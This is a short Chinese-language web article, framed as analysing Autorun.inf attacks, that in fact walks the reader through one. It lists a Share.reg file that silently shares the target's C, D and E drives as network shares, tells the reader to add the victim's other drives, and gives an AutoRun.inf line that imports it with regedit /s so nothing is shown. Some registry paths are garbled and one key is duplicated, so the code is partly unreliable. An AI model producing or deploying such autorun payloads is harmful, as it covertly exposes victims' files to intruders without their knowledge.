解析来自Autorun.inf文件的攻击

  REGEDIT4
  ’此处一定要空一行
  [HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionNetworkLanmanC$]
  ”Path”=”C:\”
  ”Remark”=””
  ”Type”=dword:00000000
  ”Flags”=dword:00000302
  ”Parmlenc”=hex:
  ”Parm2enc”=hex:
  [HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionNetworkLanmanD$]
  ”Path”=”D:\”
  ”Remark”=””
  ”Type”=dword:00000000
  ”Flags”=dword:00000302
  ”Parmlenc”=hex:
  ”Parm2enc”=hex:
  [HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionNetworkLanmanC$]
  ”Path”=”E:\”
  ”Remark”=””
  ”Type”=dword:00000000
  ”Flags”=dword:00000302
  ”Parmlenc”=hex:
  ”Parm2enc”=hex:

  以上我只设置到E盘,如果对方有很多逻辑盘符的请自行设置。将以上部分另存为Share.reg文件备用。要特别注意REGEDIT4为大写且顶格书写,其后要空上一行,在最后一行记得要按一次回车键。
  然后打开记事本,编制一个AutoRun.inf文件,键入以下内容:

  [AutoRun]
  Open=regedit/s Share.reg //加/s参数是为了导入时不会显示任何信息

声明:本站部分文章及图片源自用户投稿,如本站任何资料有侵权请您尽早请联系jinwei@zod.com.cn进行处理,非常感谢!

上一篇 2021年2月1日
下一篇 2021年2月1日

相关推荐